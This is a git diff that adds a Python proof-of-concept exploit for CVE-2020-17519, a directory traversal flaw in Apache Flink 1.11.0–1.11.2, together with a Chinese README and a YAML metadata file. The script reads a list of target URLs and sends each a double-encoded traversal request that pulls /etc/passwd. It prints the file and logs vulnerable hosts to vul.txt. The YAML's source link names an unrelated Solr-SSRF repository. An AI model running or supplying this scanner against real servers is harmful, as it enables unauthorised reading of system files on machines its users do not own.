diff --git a/cve/apache-Flink/2020/CVE-2020-17519/CVE-2020-17519.py b/cve/apache-Flink/2020/CVE-2020-17519/CVE-2020-17519.py new file mode 100644 index 0000000000000000000000000000000000000000..826baef1c66df5a88e81636fce5ebbf47fa890f7 --- /dev/null +++ b/cve/apache-Flink/2020/CVE-2020-17519/CVE-2020-17519.py @@ -0,0 +1,52 @@ +#!/usr/bin/env python +# coding:utf-8 +# author:B1anda0 +#affected versions are Apache Flink 1.11.0-1.11.2 + +import requests,sys,colorama +from colorama import * +init(autoreset=True) + + +banner='''\033[1;33;40m + _______ ________ ___ ___ ___ ___ __ ______ _____ __ ___ + / ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ |____ | ____/_ |/ _ \ +| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | / /| |__ | | (_) | +| | \ \/ / | __|______/ /| | | |/ /| | | |______| | / / |___ \ | |\__, | +| |____ \ / | |____ / /_| |_| / /_| |_| | | | / / ___) || | / / + \_____| \/ |______| |____|\___/____|\___/ |_|/_/ |____/ |_| /_/ +''' + + +def verify(): + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"} + payload= '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd' + poc=urls+payload + try: + requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告 + response=requests.get(poc,headers=headers,timeout=15,verify=False) + if response.status_code==200 and "root:x" in response.content: + print(u'\033[1;31;40m[+]{} is apache flink directory traversal vulnerability'.format(urls)) + print(response.content) + #将漏洞地址输出在Vul.txt中 + f=open('./vul.txt','a') + f.write(urls) + f.write('\n') + else: + print('\033[1;32;40m[-]{} None'.format(urls)) + except: + print('{} request timeout'.format(urls)) + + +if __name__ == '__main__': + print (banner) + if len(sys.argv)!=2: + print('Example:python CVE-2020-17519.py urls.txt') + else: + file = open(sys.argv[1]) + for url in file.readlines(): + urls=url.strip() + if urls[-1]=='/': + urls=urls[:-1] + verify() + print ('Check Over') diff --git a/cve/apache-Flink/2020/CVE-2020-17519/README.md b/cve/apache-Flink/2020/CVE-2020-17519/README.md new file mode 100644 index 0000000000000000000000000000000000000000..0ba52e8884476df22aacf540a1504a3a9630ce82 --- /dev/null +++ b/cve/apache-Flink/2020/CVE-2020-17519/README.md @@ -0,0 +1,10 @@ +# Flink-目录遍历 +Apache Flink 目录遍历 +#Use +Apache Flink是美国阿帕奇软件(Apache)基金会的一款开源的分布式流数据处理引擎。该产品主要使用Java和Scala语言编写。Apache Flink 版本 1.11.0 至 版本1.11.2 存在安全漏洞,该漏洞允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 + +# eg +python CVE-2020-17519.py urls.txt + +# reference +code from: https://github.com/B1anda0/CVE-2020-17519 diff --git a/cve/apache-Flink/2020/yaml/CVE-2020-17519.yaml b/cve/apache-Flink/2020/yaml/CVE-2020-17519.yaml new file mode 100644 index 0000000000000000000000000000000000000000..2d7573ce353ecef7a929d63d548ff5df624f7354 --- /dev/null +++ b/cve/apache-Flink/2020/yaml/CVE-2020-17519.yaml @@ -0,0 +1,19 @@ +id: CVE-2020-17519 +source: https://github.com/Henry4E36/Solr-SSRF +info: + name: Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 + severity: high + description: + Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 + scope-of-influence: + Apache Flink = 1.11.0, Apache Flink = 1.11.1, Apache Flink = 1.11.2 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2020-17519 + - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2020-17519 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-17519 + cnnvd-id: CNNVD-202101-271 + kve-id: None + tags: cve2020,Apache,Flink,Directory traversal